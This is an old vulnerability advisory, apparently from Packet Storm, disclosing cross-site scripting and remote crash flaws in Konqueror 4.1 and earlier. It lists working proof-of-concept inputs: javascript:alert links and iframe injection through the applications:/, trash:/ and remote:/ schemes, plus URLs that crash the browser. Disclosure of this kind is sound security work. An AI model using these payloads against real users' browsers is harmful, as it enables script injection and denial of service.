Konqueror versions 4.1 and below suffer from cross site scripting and remote crash vulnerabilities.
ca886bd207116bc5a9e0237a11c6dbb21a519a08f44798f2765a79f65ce17e60+-----------------------------------------------------+
| Konqueror <= 4.1 XSS / Remote Crash Vulnerabilities |
+-----------------------------------------------------+
| by athos - staker[at]hotmail[dot]it |
| http://konqueror.kde.org |
+-----------------------------------------------------+
| Cross Site Scripting |
| |
| applications:/<a href="javascript:alert(1)">Here</a>|
| trash:/<a href="javascript:alert(1)">Here</a> |
| remote:/<a href="javascript:alert(1)">Here</a> |
| |
| you can write anything (example) |
| |
| applications:/<font size="8">THE GAME</font> |
| applications:/<iframe src="http://milw0rm.com"> |
+-----------------------------------------------------+
| Remote Crash Vulnerabilities |
| |
| remote://crash:konqueror@ |
| applications://crash:konqueror@ |
+-----------------------------------------------------+
| Error Details... |
| |
| A Fatal Error Occurred The application Konqueror |
| (konqueror) crashed and caused the signal 6(SIGABRT)|
| Please help us improve the software you use by |
| filing a report at http://bugs.kde.org. Useful |
| details include how to reproduce the error, |
| documents that were loaded, etc. |
+-----------------------------------------------------+
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed